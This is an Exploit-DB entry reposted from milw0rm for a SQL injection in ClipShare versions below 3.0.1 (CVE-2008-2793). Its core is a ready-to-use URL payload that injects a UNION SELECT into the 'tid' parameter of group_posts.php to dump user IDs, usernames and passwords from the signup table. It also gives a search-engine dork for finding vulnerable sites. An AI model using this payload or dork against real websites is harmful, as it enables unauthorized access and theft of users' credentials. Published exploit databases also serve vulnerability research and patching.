ClipShare < 3.0.1 - 'tid' SQL Injection

EDB-ID:

5839

CVE:

2008-2793

EDB Verified:

Author:

SuNHouSe2

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-06-17

Vulnerable App:

             /************************************************************************/
             /*                                                                      */
             /*                             Clipshare                                */
             /*                                                                      */
             /*                  Remote SQL Injection Vulnerability                  */
             /*                                                                      */
             /*                                                                      */
             /************************************************************************/

 [~]AUTHOR   : SuNHouSe2 [ALGERIAN HaCkEr]

 [~]DORK     : "powered by clipshare"

 [~]VERSION  : less than v3.0.1

 [~]EXPLOIT  : 

             http://localhost/group_posts.php?urlkey=1&gid=1&tid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a3a,uid,username,pwd),6,7+from+signup+limit+0,20/*


          
             ///////////////////////////////////////////////////////////////////////////////////

             ///////    Special ThanX : His0k4 , TrYaG TeAm , & ALL Muslims HaCkErs..../////////

            ///////////////////////////////////////////////////////////////////////////////////
                                        
                                    -=-=-=-= SuNHouSe2@yahoo.com =-=-=-

# milw0rm.com [2008-06-17]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services